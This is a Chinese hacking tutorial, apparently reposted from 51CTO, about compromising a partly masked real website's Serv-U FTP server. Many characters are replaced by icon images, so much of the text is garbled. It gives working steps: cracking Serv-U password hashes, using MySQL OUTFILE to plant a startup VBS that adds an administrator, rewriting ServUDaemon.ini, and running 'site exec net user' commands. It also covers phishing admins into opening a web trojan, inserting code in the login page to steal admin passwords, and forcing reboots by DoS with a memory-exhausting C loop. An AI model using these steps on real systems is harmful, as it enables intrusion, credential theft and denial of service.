来源: 51CTO.com
思路方法
:爆破法.
最显眼
![](/icons/42892de.gif)
要属用户名和密码了
![](/icons/42892dou.gif)
关键是如何破密码呢?到网上搜了
![](/icons/42892yi.gif)
个专门破SERV-U密码
![](/icons/42892de.gif)
工具(Serv-UPassCrack1.0a.rar)
![](/icons/42892dou.gif)
太慢了
![](/icons/42892dou.gif)
这要等到何年何月啊!干脆用记事本打开它
![](/icons/42892de.gif)
脚本crack.vbs.看看解密原理:假设原来明文密码用"password_mingwen"表示
![](/icons/42892dou.gif)
密文密码也就是我们在ServUDaemon.ini中看到
![](/icons/42892de.gif)
密码(34位)
![](/icons/42892dou.gif)
用"password_miwen"表示,密文
![](/icons/42892de.gif)
前两位合并上明文
![](/icons/42892dou.gif)
然后经MD5加密后正好等于密文
![](/icons/42892de.gif)
后 3十 2位!】
即:md5(password_mingwen+left(password_miwen,2)=right(password_miwen,32)俗话说
![](/icons/42892de.gif)
好啊
![](/icons/42892dou.gif)
"工欲善其事
![](/icons/42892dou.gif)
必先利其器"在网上找了两上绝配
![](/icons/42892de.gif)
工具!
![](/icons/42892yi.gif)
个是MD5CrackSpV2.3(速度增强版,
![](/icons/42892yi.gif)
个非常好用
![](/icons/42892de.gif)
MD5爆破工具)
![](/icons/42892dou.gif)
另
![](/icons/42892yi.gif)
个是字典专家.BBSt,利用它我们可以生成前两位为我们指定字母
![](/icons/42892de.gif)
字典!!MD5CrackSpV2.3速度奇快,我们可以指定开
![](/icons/42892de.gif)
线程数,我在P4,256M内存环境下做了
![](/icons/42892yi.gif)
个测试,利用字典专家.BBSt生成
![](/icons/42892yi.gif)
个含3亿条记录,1.2G左右
![](/icons/42892de.gif)
字典,用MD5CrackSpV2.3开8线程跑,总共用了30分钟!
![](/icons/42892yi.gif)
个线程
![](/icons/42892yi.gif)
秒钟跑大约2万条记录,8个线程
![](/icons/42892yi.gif)
秒钟,就是16万条记录!!照此计算
![](/icons/42892yi.gif)
台机器
![](/icons/42892yi.gif)
天就能跑约138亿条记录!假如有十台P4连合作业,威力无穷啊!同时在网上看到消息说山东大学已经研究出来了破解MD5
![](/icons/42892de.gif)
算法!但是没有找到具体
![](/icons/42892de.gif)
![](/icons/42892chengxu.gif)
![](/icons/42892dou.gif)
![](/icons/42892chengxu.gif)
![](/icons/42892yi.gif)
旦出世,密而不密,恐怕很多网站WebSite又要遭殃了!!
思路方法 2:
法.
在c:\ProgramFiles\Serv-U\ServUDaemon.ini文件中共有十多位用户
![](/icons/42892dou.gif)
其中有
![](/icons/42892yi.gif)
个
![](/icons/42892de.gif)
用户目录:"d:\s***n\a***lover\photo\gallery"吸引了我
![](/icons/42892dou2.gif)
立即在浏览器中打上
http://www.*****.net/a***lover/photo/gallery出现如下提示:"ThisVirtualDirectorydoesnotallowcontentstobelisted"
![](/icons/42892dou.gif)
在试试它
![](/icons/42892de.gif)
上
![](/icons/42892yi.gif)
级目录看看:
http://www.*****.net/a***lover/photo/真是山重水复疑无路
![](/icons/42892dou.gif)
柳暗花明又
![](/icons/42892yi.gif)
村啊!原来在机子里还藏着个某某498)this.style.width=498;" border=0>
行Sftp -I 211.92.***.*** -u b*****b -p ****** -t 1 -o 1 -p 21后没有溢出成功
![](/icons/42892dou.gif)
看来是管理员打了补丁!哪只好想别
![](/icons/42892de.gif)
办法了!(-I 表示ip地址,-u 用户名,-p 密码-o操作系统类型,-p 端口号) 以下整理总结了几种提升权限
![](/icons/42892de.gif)
思路方法供大参考:
思路方法
、打开牛族MYSQL连接器
![](/icons/42892dou.gif)
在命令行上输入:
user download;
create table cmdphp (cmd TEXT);
insert
![](/icons/42892int.gif)
o cmdphp values("
![](/icons/42892set.gif)
wshshell=createobject(\"wscript.shell\")");
insert
![](/icons/42892int.gif)
o cmdphp values("a=wshshell.run(\"cmd.exe /c net user hello hello\",0)");
insert
![](/icons/42892int.gif)
o cmdphp values("b=wshshell.run(\"cmd.exe /c net user localgroup administrators hello /add\",0)");
select * from cmdphp
![](/icons/42892int.gif)
o outfile "c:\\Documents and Settings\\Administrator\\[开始]菜单\\
![](/icons/42892chengxu.gif)
\\启动
\\cmdphp.vbs";
注 意:在路径中要用"\\"而不是"\"
![](/icons/42892dou.gif)
要加双引号时
![](/icons/42892dou.gif)
前面必需加"\"
![](/icons/42892dou2.gif)
原理是:我们在download数据库中
![](/icons/42892dou.gif)
建了
![](/icons/42892yi.gif)
个表cmdphp
![](/icons/42892dou.gif)
表中共
![](/icons/42892yi.gif)
个 字段cmd
![](/icons/42892dou.gif)
我们把要执行
![](/icons/42892de.gif)
命令写到表中
![](/icons/42892dou.gif)
然后在在表中导出到启动菜单中!这样只要
![](/icons/42892yi.gif)
重起后
![](/icons/42892dou.gif)
我们就会得到
![](/icons/42892yi.gif)
个管理员级
![](/icons/42892de.gif)
用户hello了
![](/icons/42892dou2.gif)
d:\ s***n\a***lover\photo\gallery
思路方法 2、修改SERV-U
![](/icons/42892de.gif)
文件ServUDaemon.ini中
![](/icons/42892de.gif)
相应内容:
Password=hq50AAF4CB3FA4EF89C9E9D605B20B2971
HomeDir=c:\
RelPaths=1
TimeOut=600
Access1=D:\s***n\ a***lover\photo\gallery |RWAMELCDP
Ma
![](/icons/42892int.gif)
enance=
![](/icons/42892System.gif)
SKEYValues=
把密码换成我们知道
![](/icons/42892de.gif)
密码
![](/icons/42892dou.gif)
把主目录换成c:\
![](/icons/42892dou.gif)
Access1后
![](/icons/42892de.gif)
目录可以不用换
![](/icons/42892dou.gif)
这样使管理员在SERV-U里看起来还是以前
![](/icons/42892de.gif)
目录名
![](/icons/42892dou.gif)
|RWAMELCDP这
![](/icons/42892yi.gif)
串是关键
![](/icons/42892dou.gif)
我们比以前多加了
![](/icons/42892yi.gif)
个"E"代表我们有"执行"权限
![](/icons/42892dou.gif)
Ma
![](/icons/42892int.gif)
enance=
![](/icons/42892System.gif)
表示我们
![](/icons/42892de.gif)
身份是管理员
![](/icons/42892dou2.gif)
在本地设置好后
![](/icons/42892dou.gif)
就开始想办法
![](/icons/42892dou.gif)
替换掉它
![](/icons/42892de.gif)
文件?首先
![](/icons/42892dou.gif)
利用我
![](/icons/42892de.gif)
哪个cmd.
![](/icons/42892dou2.gif)
php SHELL
![](/icons/42892de.gif)
上传文件功能
![](/icons/42892dou.gif)
先把它上传到d:\s***n\a***lover\photo\gallery目录(上传成功后文件和SHELL在同
![](/icons/42892yi.gif)
目 录)下
![](/icons/42892dou.gif)
同样再打开牛族MYSQL连接器:
user download;
create table servu (cmd TEXT);
load data infile "d:\\s***n\\a***lover\\photo\\gallery\\ServUDaemon.ini;
select * from servu
![](/icons/42892int.gif)
o outfile "C:\Program Files\Serv-U\ServUDaemon.ini";
条件是SERV-U重启后
![](/icons/42892dou.gif)
我们
![](/icons/42892de.gif)
哪个用户就是管理员了
![](/icons/42892dou.gif)
而且在C盘根目录下具有可执行权限
![](/icons/42892dou2.gif)
登上SERV-U服务器上执行如下命令:
quote site exec net.exe user hello hello /add
quote site exec net.exe localgroup administrators hello /add
这样我们就得到了
![](/icons/42892yi.gif)
个管理员级
![](/icons/42892de.gif)
用户hello
![](/icons/42892dou2.gif)
如果没有开3389我们可以利用PUT上传给它上传个3389.EXE,然后用quote执行后
![](/icons/42892dou.gif)
就可以用 3389登录器连接了!同样我们也可以利用另外
![](/icons/42892yi.gif)
个小工具xyzcmd.exe在DOS下登录
![](/icons/42892dou.gif)
会得到
![](/icons/42892yi.gif)
个CMDSHELL.
思路方法 3:由于管理员在PHP.INI中做了
![](/icons/42892yi.gif)
些限制
![](/icons/42892dou.gif)
上传
![](/icons/42892de.gif)
PHPSHELL没法执行外部命令
利用CMD.PHP
![](/icons/42892de.gif)
浏览命令
![](/icons/42892dou.gif)
你可以在它
![](/icons/42892de.gif)
上面找到它
![](/icons/42892de.gif)
PHP和SERV- U
![](/icons/42892de.gif)
安装
![](/icons/42892chengxu.gif)
![](/icons/42892dou.gif)
DOWN下来
![](/icons/42892dou.gif)
在本机上模拟它
![](/icons/42892de.gif)
环境
![](/icons/42892dou.gif)
配置自己
![](/icons/42892de.gif)
PHP.INI文件
![](/icons/42892dou.gif)
使它能够执行外部命令
![](/icons/42892dou.gif)
解释ASP和CGI
![](/icons/42892dou.gif)
然后利用思路方法 2替换掉它
![](/icons/42892de.gif)
PHP.INI文件
![](/icons/42892dou2.gif)
也有个条件就是WEB重启后才能生效
![](/icons/42892dou2.gif)
我们需要
![](/icons/42892yi.gif)
个小东西-FPIPE.EXE端口重定向工具!fpipe -v -l 5210 -s 5209 -r 43958 127.0.0.1(把本机
![](/icons/42892de.gif)
43958端口
![](/icons/42892dou.gif)
通过5209端口
![](/icons/42892dou.gif)
转发到5210端口)打开你本地SERV-U添加
![](/icons/42892yi.gif)
台服务器
![](/icons/42892dou.gif)
来连接5210,填上服务 器IP
![](/icons/42892dou.gif)
监听端口号5210
![](/icons/42892dou.gif)
填上帐户和密码! user:LocalAdministratorpass:
#l@$ak#.lk;0@P全部搞定后
![](/icons/42892dou.gif)
来连接SERV-U
![](/icons/42892dou.gif)
连接成功后
![](/icons/42892dou.gif)
我们就对此服务器SERV-U有了完全控制权限!然后登录上 SERV-U加管理员用户就OK了!
思路方法 4:社会工程学加网页木马!
在04年黑防第6期我
![](/icons/42892de.gif)
朋友血汉
![](/icons/42892de.gif)
![](/icons/42892smhl.gif)
网页木马让你肉鸡成群
![](/icons/42892smhr.gif)
![](/icons/42892yi.gif)
文中
![](/icons/42892dou.gif)
讲了许多 做木马
![](/icons/42892de.gif)
思路方法
![](/icons/42892dou.gif)
在这里就不啰嗦了
![](/icons/42892dou.gif)
省
![](/icons/42892de.gif)
老独说转稿费
![](/icons/42892dou.gif)
哈哈!把"马"传上去后
![](/icons/42892dou.gif)
可以在论坛里发个贴子
![](/icons/42892dou.gif)
如"管理员我发现了此网站WebSite
![](/icons/42892yi.gif)
个漏洞!"或"管理员我 对网站WebSite有几点建议"估计不久真
![](/icons/42892de.gif)
会成为"养鸡专业户了"
![](/icons/42892dou2.gif)
建议不要改人家
![](/icons/42892de.gif)
主页
![](/icons/42892dou.gif)
![](/icons/42892yi.gif)
来不好
![](/icons/42892dou.gif)
2来如果挂在主页上
![](/icons/42892dou.gif)
管理员看到后不
![](/icons/42892yi.gif)
定会点开!还有更隐蔽
![](/icons/42892yi.gif)
招
![](/icons/42892dou.gif)
就是修改源
![](/icons/42892chengxu.gif)
(估计
![](/icons/42892yi.gif)
般管理员不会没事读源
![](/icons/42892chengxu.gif)
吧^_^)
![](/icons/42892dou.gif)
找到网站WebSite登录
![](/icons/42892de.gif)
![](/icons/42892chengxu.gif)
![](/icons/42892dou.gif)
加
![](/icons/42892yi.gif)
段
![](/icons/42892chengxu.gif)
![](/icons/42892dou.gif)
可以根据ID来判断是管理员
![](/icons/42892dou.gif)
如果是把他
![](/icons/42892de.gif)
密码(在 如MD5加密前)插入到你
![](/icons/42892de.gif)
信箱或QQ等字段中
![](/icons/42892dou.gif)
这样你可以打开你
![](/icons/42892de.gif)
用户资料来看了!!
接下来谈谈如何叫服务器重起:
思路方法
![](/icons/42892yi.gif)
、我非常建议用
![](/icons/42892de.gif)
思路方法哪就是DOS攻击!
思路方法 2、如果你上传
![](/icons/42892de.gif)
SHELL能执行命令!可以传
![](/icons/42892yi.gif)
个很简单
![](/icons/42892de.gif)
C
![](/icons/42892chengxu.gif)
![](/icons/42892dou.gif)
让它不断地MALLOC分配内存
![](/icons/42892dou.gif)
而且不FREE
![](/icons/42892dou2.gif)
#i nclude
#i nclude
![](/icons/42892main.gif)
![](/icons/42892kh.gif)
{for(; ;) malloc(0xffffff);}
思路方法 3、如果
![](/icons/42892yi.gif)
些网站WebSite是PHP
![](/icons/42892de.gif)
不能执行外部命令(我们上传上去
![](/icons/42892de.gif)
可执行文件不能运行)!
延伸阅读
最新评论